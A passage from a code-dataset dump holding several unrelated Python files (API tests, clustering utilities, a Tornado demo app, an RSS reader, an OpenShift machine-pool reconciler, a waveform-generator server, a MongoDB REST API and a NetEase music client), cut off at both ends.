itemsToWrite)))\n lineToWrite += \"\\n\"\n stateCodeToDataMap[stateCode].insert(0, lineToWrite)\n else:\n doneWithStateData[stateCode] = True\n prevDate = date\n\nprint(\"Data prepared!\")\n\nfor stateCode in filenameToHandlerMap:\n fileHandler = filenameToHandlerMap[stateCode]\n linesToWrite = stateCodeToDataMap[stateCode]\n fileHandler.writelines(linesToWrite)\n fileHandler.close()\nprint(\"Data written!\")\n","sub_path":"World-Wide-Covid19/us-pull.py","file_name":"us-pull.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319249457","text":"import pytest\n\nfrom ..utils import as_param, integer, string\n\n\n@pytest.mark.parametrize(\n \"parameter\",\n (\n integer(name=\"id1\", required=True),\n integer(name=\"id2\", maximum=5, required=True),\n integer(name=\"id3\", maximum=5, exclusiveMaximum=True, required=True),\n integer(name=\"id4\", maximum=5, multipleOf=4, required=True),\n integer(name=\"id5\", minimum=5, required=True),\n integer(name=\"id6\", minimum=5, exclusiveMinimum=True, required=True),\n integer(name=\"id7\", minimum=5, multipleOf=4, required=True),\n ),\n)\ndef test_integer(testdir, parameter):\n testdir.make_test(\n \"\"\"\nvalidator = {{\n \"id1\": noop,\n \"id2\": lambda x: x <= 5,\n \"id3\": lambda x: x < 5,\n \"id4\": lambda x: x % 4 == 0,\n \"id5\": lambda x: x >= 5,\n \"id6\": lambda x: x > 5,\n \"id7\": lambda x: x % 4 == 0,\n}}[\"{name}\"]\n@schema.parametrize()\n@settings(max_examples=3)\ndef test_(case):\n assert case.path == \"/v1/users\"\n assert case.method in (\"GET\", \"POST\")\n validator(case.query[\"{name}\"])\n \"\"\".format(\n name=parameter[\"name\"]\n ),\n **as_param(parameter),\n )\n testdir.run_and_assert(passed=1)\n\n\n@pytest.mark.parametrize(\n \"parameter\",\n (\n string(name=\"key1\", required=True),\n string(name=\"key2\", maxLength=5, required=True),\n string(name=\"key3\", minLength=5, required=True),\n string(name=\"key4\", pattern=\"ab{2}\", required=True),\n string(name=\"key5\", minLength=3, maxLength=6, pattern=\"ab{2}\", required=True),\n string(name=\"key6\", format=\"date\", required=True),\n string(name=\"key7\", format=\"date-time\", required=True),\n string(name=\"key8\", type=\"file\", required=True),\n ),\n)\ndef test_string(testdir, parameter):\n testdir.make_test(\n \"\"\"\nvalidator = {{\n \"key1\": noop,\n \"key2\": lambda x: len(x) <= 5,\n \"key3\": lambda x: len(x) >= 5,\n \"key4\": lambda x: \"abb\" in x,\n \"key5\": lambda x: len(x) in (3, 4, 5, 6) and \"abb\" in x,\n \"key6\": assert_date,\n \"key7\": assert_datetime,\n \"key8\": assert_bytes,\n}}[\"{name}\"]\n@schema.parametrize()\n@settings(max_examples=3)\ndef test_(case):\n assert case.path == \"/v1/users\"\n assert case.method in (\"GET\", \"POST\")\n validator(case.query[\"{name}\"])\n \"\"\".format(\n name=parameter[\"name\"]\n ),\n **as_param(parameter),\n )\n testdir.run_and_assert(passed=1)\n","sub_path":"test/generation/test_primitive.py","file_name":"test_primitive.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"653398828","text":"import scipy.cluster\n\n################################################################################\n\ndef cluster_frequencies(plv, byc):\n\n m = plv.get(\"plot_cluster_metric\", \"complete\")\n\n matrix = matrix_from_interval_frequencies(plv, byc)\n linkage = scipy.cluster.hierarchy.linkage(matrix, method=m)\n dendrogram = scipy.cluster.hierarchy.dendrogram(linkage, no_plot=True, orientation=\"right\")\n \n return dendrogram\n\n################################################################################\n\ndef matrix_from_interval_frequencies(plv, byc):\n\n matrix = []\n\n for f_set in plv[\"results\"]:\n\n i_f = f_set.get(\"interval_frequencies\", [])\n if_line = []\n\n for i_f in f_set.get(\"interval_frequencies\", []):\n if_line.append( i_f.get(\"gain_frequency\", 0) )\n for i_f in f_set.get(\"interval_frequencies\", []):\n if_line.append( i_f.get(\"loss_frequency\", 0) )\n\n matrix.append(if_line)\n\n return matrix\n\n################################################################################\n\ndef cluster_samples(plv, byc):\n\n m = plv.get(\"plot_cluster_metric\", \"complete\")\n\n matrix = []\n\n for s in plv[\"results\"]:\n s_line = []\n\n if \"intcoverage\" in plv.get(\"plot_samples_cluster_type\", \"\"):\n\n c_m = s.get(\"cnv_statusmaps\", {})\n dup_l = c_m.get(\"dup\", [])\n del_l = c_m.get(\"del\", [])\n for i_dup in dup_l:\n s_line.append(i_dup)\n for i_del in del_l:\n s_line.append(i_del)\n else:\n c_s = s.get(\"cnv_chro_stats\", {})\n for c_a, c_s_v in c_s.items():\n s_line.append(c_s_v.get(\"dupfraction\", 0))\n for c_a, c_s_v in c_s.items():\n s_line.append(c_s_v.get(\"delfraction\", 0))\n\n matrix.append(s_line)\n\n linkage = scipy.cluster.hierarchy.linkage(matrix, method=m)\n reorder = scipy.cluster.hierarchy.leaves_list(linkage)\n dendrogram = scipy.cluster.hierarchy.dendrogram(linkage, no_plot=True, orientation=\"right\")\n\n return dendrogram\n","sub_path":"bycon/lib/clustering_utils.py","file_name":"clustering_utils.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462693568","text":"import datetime\nimport hashlib\nimport logging\nimport sys\n\n\nVERBOSIT = logging.DEBUG\n\n\ndef get_logger(name):# Configure log sytle\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(VERBOSIT)\n ch.setFormatter(logging.Formatter('[%(asctime)s][%(name)s-%(levelname)s] %(message)s'))\n logger = logging.getLogger(name)\n logger.setLevel(VERBOSIT)\n logger.addHandler(ch)\n return logger\n\n\ndef calculate_sha256(path):\n with open(path, 'rb') as f:\n sh = hashlib.sha256()\n sh.update(f.read())\n return sh.hexdigest()\n\n\ndef get_timestr():\n return datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n","sub_path":"tools/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239474905","text":"from tornado.web import Application, RequestHandler\nimport tornado.ioloop\nimport uimethods as mt\nimport uimodules as md\ntransfer=[]\nUSER_INFO = {'isLogin': None}\nNEWS_list = [\n {\"title\": \"哈哈哈\", \"content\": \"笑什么笑,哼。。。\"},\n {\"title\": \"啦啦啦\", \"content\": \"得意,哼。。。\"},\n\n]\nclass myTor(RequestHandler):\n def get(self, *args, **kwargs):\n # return self.write(\"hello word\")\n self.render(\"s1.html\",npm = transfer)\n\n def post(self, *args, **kwargs):\n title = self.get_argument(\"title\")\n comment = self.get_argument(\"comment-area\")\n transfer.append({'title': title})\n transfer.append({'comment': comment})\n self.redirect('/index')\n\nclass IndexHander(RequestHandler):\n def get(self, *args, **kwargs):\n # return self.write(\"hello word\")\n self.render(\"chouti.html\", user_info = USER_INFO, newsList = NEWS_list)\n\n def post(self, *args, **kwargs):\n title = self.get_argument(\"title\")\n comment = self.get_argument(\"comment-area\")\n transfer.append({'title': title})\n transfer.append({'comment': comment})\n self.set_cookie('auth','1')\n self.redirect('/index')\n\nclass LoginHander(RequestHandler):\n def post(self, *args, **kwargs):\n username = self.get_argument(\"username\", None)\n pwd = self.get_argument(\"pwd\", None)\n if username == 'tangxu' and pwd == '123':\n USER_INFO['isLogin'] = True\n USER_INFO['username'] = username\n self.render('chouti.html', user_info = USER_INFO, newsList = NEWS_list)\n\n\nclass PublishHander(RequestHandler):\n def post(self, *args, **kwargs):\n co = self.get_cookie('auth')\n title = self.get_argument(\"title\", None)\n content = self.get_argument(\"content\", None)\n print(title, content)\n essay = {\"title\": title, \"content\": content}\n NEWS_list.append(essay)\n self.redirect('/chouti')\n\nclass LogoutHander(RequestHandler):\n def get(self, *args, **kwargs):\n USER_INFO['isLogin'] = False\n self.redirect('/chouti')\n\nsettings = {\n \"static_path\": \"static\",\n \"template_path\": \"template\",\n \"ui_methods\": mt,\n \"ui_modules\": md,\n}\n\napplication = Application([\n (r'/index', myTor),\n (r'/chouti', IndexHander),\n (r'/login', LoginHander),\n (r'/publish', PublishHander),\n (r'/Logout', LogoutHander),\n], **settings)\n\nif __name__ == \"__main__\":\n application.listen(8000)\n tornado.ioloop.IOLoop.instance().start()","sub_path":"myTo.py","file_name":"myTo.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"421553001","text":"#!/usr/bin/python3\nimport feedparser as fp\nimport re\nimport sqlite3\nimport os\n\n\"\"\" Asks for the user input of the urls he wishes to parse \"\"\"\ndef ask_urls():\n urls =[]\n while True:\n url = input(\"\\nType the url of an RSS feed or type \\\"done\\\" if you're done\\n\")\n if url != \"done\" and url not in urls:\n urls.append(url)\n elif url == \"done\":\n break\n else:\n print(\"\\nYou've already typed this url\\n\")\n return urls\n\n\"\"\" Receives a list of urls and returns a list of feedparser objects \"\"\"\ndef feeder(urls):\n feeds = []\n for i in range(len(urls)):\n feeds[i] = fp.parse(urls[i])\n return feeds\n\n\n\"\"\" Stores urls in a text file, it receives a list of strings and a file path to save the file \"\"\"\ndef store_RSS_urls(urls):\n if os.path.exists(\"rss_urls.db\"):\n os.remove(\"rss_urls.db\")\n\n rss_urls = sqlite3.connect(\"rss_urls.db\")\n cursor = rss_urls.cursor()\n cursor.execute(\"\"\" CREATE TABLE links \n (\n url text,\n ind integer primary key\n ) \n \"\"\")\n rss_urls.commit()\n\n n = len(urls)\n for i in range(n):\n url = urls[i]\n cursor.execute(\"INSERT INTO links VALUES (?, ?);\",(url, i))\n rss_urls.commit()\n rss_urls.close()\n\n\"\"\" Receives a list containng feedparser objects and displays every article in it \"\"\"\ndef display_articles(feed):\n print(len(feed.entries))\n for i in range(len(feed.entries)):\n print(\"Article {}\".format(i+1))\n try:\n title = feed.entries[i].title\n except:\n title = \"Unknown\"\n try:\n author = feed.entries[i].source.title\n except:\n try:\n author = feed.entries[i].author\n except:\n author = \"Unknown\"\n try:\n category = feed.entries[i].category\n except:\n category = \"Unknown\"\n try:\n date = feed.entries[i].published\n except:\n date = \"Unknown\"\n print(\"Title: {}\\nAuthor: {}\\nCategory: {}\\nDate Published: {}\\n\".format(title, author, category, date))\n\n\n\"\"\" Receives a feedparser.entries object and displays it's description and full summary if the user wishes to do so \"\"\"\ndef display_description(feed_entry):\n summary = feed_entry.summary\n remove_tag = re.compile(r\"(<.*>)([^.]*)\")\n match = remove_tag.findall(summary)\n #print(match[0][1])\n #import pdb;pdb.set_trace()\n if match[0][1] != None:\n print(match[0][1] + \"...\")\n else:\n print(match[0][0] + \"...\")\n ask_summary = input(\"Do you wish to display the whole text of the article? [Y/N]\\n\")\n if ask_summary == \"Y\":\n print(summary)\n\n\ndef astronaut():\n print(\"\"\" _..._\n .' '. _\n / .-\"\"-\\ _/ \\\n .-| /:. | | |\n | \\ |:. /.-'-./\n | .-'-;:__.' =/\n .'= *=|NASA _.='\n / _. | ;\n ;-.-'| \\ |\n/ | \\ _\\ _\\\n\\__/'._;. ==' ==\\\n \\ \\ |\n / / /\n /-._/-._/\n jgs \\ `\\ \\\n `-._/._/\n \"\"\")\n\n\n\"\"\" Main Functions, calls all the other functions and gets the input from the user \"\"\"\nif __name__==\"__main__\":\n astronaut()\n urls = ask_urls()\n while True:\n delete_url = input(\"Do you want to exclude any previously typed url? [Y/N]:\\n\")\n if delete_url == \"Y\":\n remove = input(\"\\ntype the url you wish to remove:\\n\")\n urls.remove(remove)\n print(\"\\nurl: {} removed!\\n\".format(remove))\n elif delete_url == \"N\":\n break\n\n print(\"\\ncurrent rss feeds:\")\n\n for item in urls:\n print(item)\n\n #file_path = input(\"\\nType the file path you wish to save your RSS urls: (i.e d:/tmp/rss.txt)\\n\")\n store_RSS_urls(urls)\n\n for i in range(len(urls)):\n print(\"\\n{}- url:\\t{}\\n\".format(i+1, urls[i]))\n\n\n index = int(input(\"From the list above, type the number that corresponds to the url you wish to see the articles of\\n\"))\n feed = fp.parse(urls[index-1])\n display_articles(feed)\n while True:\n q_read_article = input(\"Do you wish to see a description from an article from the list above? [Y/N] (If you choose N the program will close)\\n\")\n if q_read_article == \"Y\":\n art_index = int(input(\"Type the article number you wish to see:\\n\")) - 1\n display_description(feed.entries[art_index])\n elif q_read_article == \"N\":\n break\n","sub_path":"rssfeeder/using_sqlite/RSSfeederSQL.py","file_name":"RSSfeederSQL.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157652893","text":"import json\nimport logging\nimport sys\nfrom collections.abc import Mapping\nfrom typing import Any\n\nfrom reconcile import queries\nfrom reconcile.utils.disabled_integrations import integration_is_enabled\nfrom reconcile.utils.ocm import OCMMap\n\nQONTRACT_INTEGRATION = \"ocm-machine-pools\"\n\n\ndef fetch_current_state(clusters):\n settings = queries.get_app_interface_settings()\n ocm_map = OCMMap(\n clusters=clusters, integration=QONTRACT_INTEGRATION, settings=settings\n )\n\n current_state = []\n for cluster in clusters:\n cluster_name = cluster[\"name\"]\n ocm = ocm_map.get(cluster_name)\n machine_pools = ocm.get_machine_pools(cluster_name)\n for machine_pool in machine_pools:\n machine_pool[\"cluster\"] = cluster_name\n current_state.append(machine_pool)\n\n return ocm_map, current_state\n\n\ndef fetch_desired_state(clusters):\n desired_state = []\n for cluster in clusters:\n cluster_name = cluster[\"name\"]\n machine_pools = cluster[\"machinePools\"]\n for machine_pool in machine_pools:\n machine_pool[\"cluster\"] = cluster_name\n labels = machine_pool.pop(\"labels\")\n if labels:\n machine_pool[\"labels\"] = json.loads(labels)\n taints = machine_pool.pop(\"taints\")\n if taints:\n machine_pool[\"taints\"] = taints\n desired_state.append(machine_pool)\n\n return desired_state\n\n\ndef calculate_diff(current_state, desired_state):\n diffs = []\n err = False\n for d in desired_state:\n c = [\n c\n for c in current_state\n if d[\"cluster\"] == c[\"cluster\"] and d[\"id\"] == c[\"id\"]\n ]\n if not c:\n d[\"action\"] = \"create\"\n diffs.append(d)\n continue\n if len(c) != 1:\n logging.error(f\"duplicate id found in {d['cluster']}\")\n err = True\n continue\n c = c[0]\n if c == d:\n continue\n if d[\"instance_type\"] != c[\"instance_type\"]:\n logging.error(\n f\"can not update instance type for existing \"\n f\"machine pool {d['id']} in {d['cluster']}\"\n )\n err = True\n continue\n d.pop(\"instance_type\")\n for key in [\"labels\", \"taints\"]:\n if c.get(key, None) != d.get(key, None):\n # https://github.com/openshift/machine-api-operator/blob/master/FAQ.md\n logging.warning(\n f\"update {key} for machine pool {d['id']} \"\n f\"will only be applied to new Nodes\"\n )\n d[\"action\"] = \"update\"\n diffs.append(d)\n\n for c in current_state:\n d = [\n d\n for d in desired_state\n if c[\"cluster\"] == d[\"cluster\"] and c[\"id\"] == d[\"id\"]\n ]\n if not d:\n c[\"action\"] = \"delete\"\n diffs.append(c)\n\n return diffs, err\n\n\ndef act(dry_run, diffs, ocm_map):\n for diff in diffs:\n action = diff.pop(\"action\")\n cluster = diff.pop(\"cluster\")\n logging.info([action, cluster, diff[\"id\"]])\n if not dry_run:\n ocm = ocm_map.get(cluster)\n if action == \"create\":\n ocm.create_machine_pool(cluster, diff)\n elif action == \"update\":\n ocm.update_machine_pool(cluster, diff)\n elif action == \"delete\":\n ocm.delete_machine_pool(cluster, diff)\n\n\ndef _cluster_is_compatible(cluster: Mapping[str, Any]) -> bool:\n return cluster.get(\"ocm\") is not None and cluster.get(\"machinePools\") is not None\n\n\ndef run(dry_run, gitlab_project_id=None, thread_pool_size=10):\n clusters = queries.get_clusters()\n clusters = [\n c\n for c in clusters\n if integration_is_enabled(QONTRACT_INTEGRATION, c) and _cluster_is_compatible(c)\n ]\n if not clusters:\n logging.debug(\"No machinePools definitions found in app-interface\")\n sys.exit(0)\n\n ocm_map, current_state = fetch_current_state(clusters)\n desired_state = fetch_desired_state(clusters)\n diffs, err = calculate_diff(current_state, desired_state)\n act(dry_run, diffs, ocm_map)\n\n if err:\n sys.exit(1)\n","sub_path":"reconcile/ocm_machine_pools.py","file_name":"ocm_machine_pools.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544845195","text":"from Instrument.WaveformGenerator.USTCDAC.da_board import *\nimport filecmp\nfrom Instrument.WaveformGenerator.USTCDAC.data_waves import *\nimport matplotlib.pyplot as plt\n\n\nclass USTCDACServer:\n def __init__(self, ip, port=80, sessionPermenent=False, singleBoard=False):\n self.ip = ip\n self.port = port\n self.dev = None\n self.sessionInited = False\n self.sessionPermenent = sessionPermenent\n self.beginSession()\n self.dev.set_loop(1, 1, 1, 1)\n self.dev.set_multi_board(0 if not singleBoard else 1)\n self.dev.set_trig_select(0)\n self.endSession()\n\n def beginSession(self):\n if (not self.sessionInited) or (not self.sessionPermenent):\n self.dev = DABoard(id='{}:{}'.format(self.ip, self.port), ip=self.ip, port=self.port, batch_mode=False)\n self.dev.connect()\n\n def endSession(self):\n if (not self.sessionPermenent):\n self.dev.disconnect()\n self.dev = None\n\n def turnOn(self, channel):\n assert channel >= 1 and channel <= 4\n self.dev.start_output_wave(channel)\n\n def turnOff(self, channel):\n assert channel >= 1 and channel <= 4\n self.dev.stop_output_wave(channel)\n\n def turnOnAllChannels(self):\n for i in range(1, 5):\n self.turnOn(i)\n\n def turnOffAllChannels(self):\n for i in range(1, 5):\n self.turnOff(i)\n\n def writeWaveform(self, channel, wave):\n print('writing waveform of ', channel, 'with length of ', len(wave))\n\n def loop_start_seq(wave_addr, wave_len, loop_level, loop_cnt):\n assert loop_level in [0, 1, 2, 3]\n assert wave_addr & 7 == 0\n assert wave_len & 7 == 0\n assert 0 < loop_cnt < 65536\n ctrl = (0x1 << 11) | (loop_level << 8)\n return [wave_addr >> 3, wave_len >> 3, loop_cnt, ctrl]\n\n def loop_stop_seq(wave_addr, wave_len, loop_level, jump_addr):\n assert loop_level in [0, 1, 2, 3]\n assert wave_addr & 7 == 0\n assert wave_len & 7 == 0\n assert 0 <= loop_cnt < 4095\n ctrl = (0x2 << 11) | (loop_level << 8)\n return [wave_addr >> 3, wave_len >> 3, jump_addr, ctrl]\n\n wave_addr = 0 # 波形存储在0地址开始的地方\n length = len(wave) # 100k采样点,50us波形\n ctrl = 0x8 << 11\n seq_T = [wave_addr >> 3, length >> 3, 0, ctrl]\n loop_cnt = 4000 # 每一级循环都是10000次,4级就是10000的4次方,每一条序列都会输出50us波形\n seq_L1 = loop_start_seq(wave_addr, length, 0, loop_cnt)\n seq_L2 = loop_start_seq(wave_addr, length, 1, loop_cnt)\n seq_L3 = loop_start_seq(wave_addr, length, 2, loop_cnt)\n seq_L4 = loop_start_seq(wave_addr, length, 3, loop_cnt)\n seq_J1 = loop_stop_seq(wave_addr, length, 0, 1)\n seq_J2 = loop_stop_seq(wave_addr, length, 1, 2)\n seq_J3 = loop_stop_seq(wave_addr, length, 2, 3)\n seq_J4 = loop_stop_seq(wave_addr, length, 3, 4)\n ctrl = 0x8000\n seq_S = [wave_addr >> 3, length >> 3, 0, ctrl]\n seq = seq_T + seq_L1 + seq_L2 + seq_L3 + seq_L4 + seq_J4 + seq_J3 + seq_J2 + seq_J1 + seq_S\n\n self.dev.write_seq_fast(channel, seq=seq)\n self.dev.write_wave_fast(channel, wave=wave)\n\n def sendTrigger(self, interval1, count1, interval2, count2):\n self.dev.clear_trig_count()\n self.dev.set_trig_count_l1(count1)\n self.dev.set_trig_interval_l1(interval1)\n self.dev.set_trig_count_l2(count2)\n self.dev.set_trig_interval_l2(interval2)\n self.dev.send_int_trig()\n\nclass MergedUSTCDACServer:\n def __init__(self, awgs, channelMapping):\n self.awgs = awgs\n self.channelMapping = channelMapping\n\n def turnOn(self, channel):\n mappedChannel = self.channelMapping[channel]\n self.awgs[mappedChannel[0]].beginSession()\n self.awgs[mappedChannel[0]].turnOn(mappedChannel[1])\n self.awgs[mappedChannel[0]].endSession()\n\n def turnOff(self, channel):\n mappedChannel = self.channelMapping[channel]\n self.awgs[mappedChannel[0]].beginSession()\n self.awgs[mappedChannel[0]].turnOff(mappedChannel[1])\n self.awgs[mappedChannel[0]].endSession()\n\n def turnOnAllChannels(self):\n for awg in self.awgs:\n awg.beginSession()\n awg.turnOnAllChannels()\n awg.endSession()\n\n def turnOffAllChannels(self):\n for awg in self.awgs:\n awg.beginSession()\n awg.turnOffAllChannels()\n awg.endSession()\n\n def writeWaveform(self, channel, wave):\n mappedChannel = self.channelMapping[channel]\n self.awgs[mappedChannel[0]].beginSession()\n self.awgs[mappedChannel[0]].writeWaveform(mappedChannel[1], [(2 * v - 1) * 32765 for v in wave])\n self.awgs[mappedChannel[0]].endSession()\n\n def sendTrigger(self, awgIndex, interval1, count1, interval2, count2):\n dev = self.awgs[awgIndex]\n dev.beginSession()\n dev.sendTrigger(interval1, count1, interval2, count2)\n dev.endSession()\n\n\nif __name__ == '__main__':\n from interactionfreepy import IFWorker\n from interactionfreepy import IFLoop\n\n awg = USTCDACServer('192.168.25.237', sessionPermenent=True)\n IFWorker('tcp://192.168.25.5:224', 'USTCAWG_237', awg)\n\n IFLoop.join()\n","sub_path":"InteractionFreeLocal/Instrument/WaveformGenerator/USTCDAC/USTCAWGServer.py","file_name":"USTCAWGServer.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"498227616","text":"import json\nimport ast\nfrom bottle import route, run, request, abort, response\nfrom json import dumps\nfrom bson import ObjectId, json_util\nimport pymongo\nimport serverconfig as cfg\n\nmyclient = pymongo.MongoClient(cfg.mongoServer)\nmydb = myclient[cfg.mongoClient]\nmycol = mydb[cfg.mongoDb]\n\n\n#\n# Route for adding single recdord\n#\n\n@route('/stat', method='PUT')\ndef put_document():\n data = request.body.readline()\n if not data:\n abort(400, 'No data received')\n entity = json.loads(data.decode('utf-8'))\n\n# entity = json.loads(data)\n x = mycol.insert_one(entity)\n rv = [{ \"id\": str(x.inserted_id)}]\n response.content_type = 'application/json'\n return dumps(rv)\n\n#\n# Route for adding bulk records\n#\n\n@route('/statbulk', method='PUT')\ndef put_document():\n data = request.body.readline()\n if not data:\n abort(400, 'No data received')\n\n entity = json.loads(data.decode('utf-8'))\n x = mycol.insert_many(entity)\n entity = x.inserted_ids\n page_sanitized = json.loads(json_util.dumps(entity))\n response.content_type = 'application/json'\n return dumps(page_sanitized)\n\n#\n# Route for getting single document\n#\n\n@route('/stat/:id', method='GET')\ndef get_document(id):\n entity = mycol.find_one({'_id': ObjectId(id)})\n if not entity:\n abort(404, 'No document with id %s' % id)\n\n page_sanitized = json.loads(json_util.dumps(entity))\n return page_sanitized\n\n#\n# Route for get list of documents with pagination and filters\n# Pagination: page = X\n# Limit: limit = Y\n#\n# Params:\n# page - pagination param\n# limit - documents per page. Default value is 10\n#\n# Filter syntax:\n# $eq\tMatches values that are equal to a specified value.\n# $gt\tMatches values that are greater than a specified value.\n# $gte\tMatches values that are greater than or equal to a specified value.\n# $in\tMatches any of the values specified in an array.\n# $lt\tMatches values that are less than a specified value.\n# $lte\tMatches values that are less than or equal to a specified value.\n# $ne\tMatches all values that are not equal to a specified value.\n# $nin\tMatches none of the values specified in an array.\n#\n\n@route('/list', method='GET')\ndef get_document_page():\n page = request.query.page\n limit = request.query.limit\n filters = {}\n\n if request.query.filters:\n filters = ast.literal_eval(request.query.filters)\n\n if not limit:\n limit = 10\n\n if not page:\n entity = mycol.find(filters).limit(int(limit)).sort(\"id\", pymongo.DESCENDING)\n\n else:\n entity = mycol.find(filters).skip(int(page) * int(limit)).limit(int(limit)).sort(\"id\", pymongo.DESCENDING)\n page_sanitized = json.loads(json_util.dumps(entity))\n response.content_type = 'application/json'\n return dumps(page_sanitized)\n\nrun(host='0.0.0.0', port=8089)","sub_path":"myrestapi.py","file_name":"myrestapi.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"372121858","text":"# netease music api\n# coding:utf-8\n\ndefault_timeout = 10\n\nimport json\nimport requests\nimport hashlib\n\nclass NetEase:\n\n # create header & cookies\n def __init__(self):\n self.header = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,gl;q=0.6,zh-TW;q=0.4',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'music.163.com',\n 'Referer': 'http://music.163.com/search/',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'\n }\n self.cookies = {\n 'appver': '1.5.2'\n }\n\n # create httpRequest, get & post\n def httpRequest(self, method, action, query = None, urlendoded = None, callback = None, timeout = None):\n if(method == 'GET'):\n url = action if (query == None) else (action + '?' + query)\n connection = requests.get(url, headers = self.header, timeout = default_timeout)\n elif(method == 'POST'):\n connection = requests.post(\n action,\n data = query,\n headers = self.header,\n timeout = default_timeout\n )\n\n connection.encoding = \"UTF-8\"\n connection = json.loads(connection.text)\n return connection\n\n # login\n def login(self, username, password):\n action = 'http://music.163.com/api/login/'\n data = {\n 'username': username,\n 'password': hashlib.md5(password).hexdigest(),\n 'rememberLogin': 'true'\n }\n try:\n return self.httpRequest('POST', action, data)\n except:\n return {'code': 501}\n\n # get username or userid\n def username(self, user):\n return user['profile']['nickname']\n\n def userid(self, user):\n return user['account']['id']\n\n # user's list\n def user_list(self, uid, offset = 0, limit = 100):\n action = 'http://music.163.com/api/user/playlist/?offset=' + str(offset) + '&limit=' + str(limit) + '&uid=' + str(uid)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['playlist'], 'list')\n except:\n return []\n\n # get new songs list\n def new_songs(self, offset = 0, limit = 100):\n action = 'http://music.163.com/api/discovery/new/songs?areaId=0&offset=' + str(offset) + '&total=true&limit=' + str(limit)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['data'], 'song')\n except:\n return []\n\n # get new top list\n def top_list(self, category = '全部', order = 'hot', offset = 0, limit = 50):\n action = 'http://music.163.com/api/playlist/list?cat=' + category + '&order' + order + '&offset' + str(offset) + '&total' + ('true' if offset else 'false') + '&limit' + str(limit)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['playlists'], 'list')\n except:\n return []\n\n # artist id --> artist's songs\n def artist(self, artist_id):\n action = 'http://music.163.com/api/artist/' + str(artist_id)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['hotSongs'], 'song')\n except:\n return []\n\n # album id --> songs\n def album(self, album_id):\n action = 'http://music.163.com/api/album/' + str(album_id)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['album']['songs'], 'song')\n except:\n return []\n\n # list id --> list tracks\n def list_details(self, list_id):\n action = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['result']['tracks'], 'song')\n except:\n return []\n\n # songs' id --> song urls\n def songs_detail(self, ids, offset = 0):\n tmpids = ids[offset:]\n tmpids = tmpids[0:100]\n tmpids = map(str, tmpids)\n action = 'http://music.163.com/api/song/detail?ids=[' + (',').join(tmpids) + ']'\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['songs'], 'song')\n except:\n return []\n\n # song id --> song url\n def song_detail(self, music_id):\n action = \"http://music.163.com/api/song/detail/?id=\" + str(music_id) + \"&ids=[\" + str(music_id) + \"]\"\n try:\n data = self.httpRequest('GET', action)\n return self.dig_info(data['songs'], 'song')\n except:\n return []\n\n # search: query string --> result\n def raw_search(self, s, stype = 1, offset = 0, total = 'true', limit = 100):\n action = 'http://music.163.com/api/search/get/web'\n data = {\n 's': s,\n 'type': stype,\n 'offset': offset,\n 'total': total,\n 'limit': limit\n }\n return self.httpRequest('POST', action, data)\n\n # search fliter: data return from search --> songs' improtant info\n # songs: 1 | album: 10 | artist: 100 | list: 1000\n def search(self, s, type):\n data = self.raw_search(s, type)\n if type == 1:\n songs_id = []\n if 'mp3Url' in data['result']['songs']:\n songs = data['result']['songs']\n else:\n for i in range(0, len(data['result']['songs']) ):\n songs_id.append( data['result']['songs'][i]['id'] )\n songs = self.songs_detail(songs_id)\n return self.dig_info(songs, 'song')\n\n elif type == 10:\n return self.dig_info(data['result']['albums'], 'album')\n\n elif type == 100:\n return self.dig_info(data['result']['artists'], 'artist')\n\n elif type == 1000:\n return self.dig_info(data['result']['playlists'], 'list')\n\n # data --> song info: get imptotant info from data\n def dig_info(self, data, dig_type):\n temp = []\n if dig_type == 'song':\n for i in range(0, len(data)):\n song_info = {\n 'song_id': data[i]['id'],\n 'artist': [],\n 'song_name': data[i]['name'],\n 'album_name': data[i]['album']['name'],\n 'mp3_url': data[i]['mp3Url']\n }\n if 'artist' in data[i]:\n song_info['artist'] = data[i]['artist']\n elif 'artists' in data[i]:\n for j in range(0, len(data[i]['artists'])):\n song_info['artist'] = ', '.join(song_info['artist'])\n else:\n song_info['artist'] = '未知艺术家'\n\n temp.append(song_info)\n\n elif dig_type == 'artist':\n temp = []\n for i in range(0, len(data)):\n artists_info = {\n 'artist_id': data[i]['id'],\n 'artist_name': data[i]['name'],\n 'alias': ''.join(data[i]['alias'])\n }\n temp.append(artists_info)\n\n return temp\n\n elif dig_type == 'album':\n for i in range(0, len(data)):\n albums_info = {\n 'album_id': data[i]['id'],\n 'album_name': data[i]['name'],\n 'artist_name': data[i]['artist']['name']\n 